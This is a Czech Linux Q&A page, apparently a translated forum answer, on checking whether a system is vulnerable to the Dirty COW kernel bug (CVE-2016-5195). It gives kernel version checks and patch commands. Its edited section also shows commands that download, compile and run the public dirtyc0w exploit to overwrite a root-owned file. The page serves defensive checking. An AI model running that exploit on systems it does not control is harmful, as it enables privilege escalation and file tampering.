GNU/Linux >> Znalost Linux >  >> Linux

Jak se ujistit, že můj operační systém není ovlivněn CVE-2016-5195 (Dirty COW)?

Můžete to udělat uname -rv zjistit verzi vašeho linuxového jádra. Získáte výstup podobný níže:

4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016

Pokud je vaše verze starší než následující, týká se vás to:

  • 4.8.0-26.28 pro Ubuntu 16.10

  • 4.4.0-45.66 pro Ubuntu 16.04 LTS

  • 3.13.0-100.147 pro Ubuntu 14.04 LTS

  • 3.2.0-113.155 pro Ubuntu 12.04 LTS

  • 3.16.36-1+deb8u2 pro Debian 8

  • 3.2.82-1 pro Debian 7

  • 4.7.8-1 pro Debian unstable


Podle security-tracker.debian musíte spustit uname -a a ověřte vaši aktuální verzi jádra .

wheezy  3.2.78-1                        vulnerable
wheezy (security)   3.2.82-1            fixed
jessie  3.16.36-1+deb8u1                vulnerable
jessie (security)   3.16.36-1+deb8u2    fixed
stretch, sid    4.7.8-1                 fixed

Tato chyba zabezpečení je opravena v rámci debianu aktualizací vašeho systému:

apt-get update
apt-get upgrade
apt-get dist-upgrade

Upravit

Jak se ujistit, že můj operační systém není ovlivněn CVE-2016-5195?

Můžete vyzkoušet následující tutoriál.

Stáhněte si exploit.

wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Jako root:Vytvořte foo soubor:

su
echo this is not a test > foo

Jako uživatel :

gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000

Ověřte svůj soubor:

cat foo

Na zranitelném počítači získáte m00000000000000000 jako výstup.


Linux
  1. Jak opravit příkaz Ifconfig nebyl nalezen v Linuxu Ubuntu

  2. Jak zpřístupnit můj modul Python v systému Linux?

  3. Jak získat aktuální operační systém v MSBuild?

  1. Jak se mohu ujistit, že můj systém používá soubor ~/.screenrc?

  2. Jak nastavit svou výchozí bránu jako trvalou v CentOS? Aby se po restartu neztratil

  3. Jak zjistit, že Java je nainstalována v systému Linux?

  1. Jak si být jisti, že adresář nebo soubor je skutečně smazán?

  2. Jednoduché vysvětlení toho, jak funguje Dirty COW?

  3. Jak mohu spolehlivě získat název operačního systému?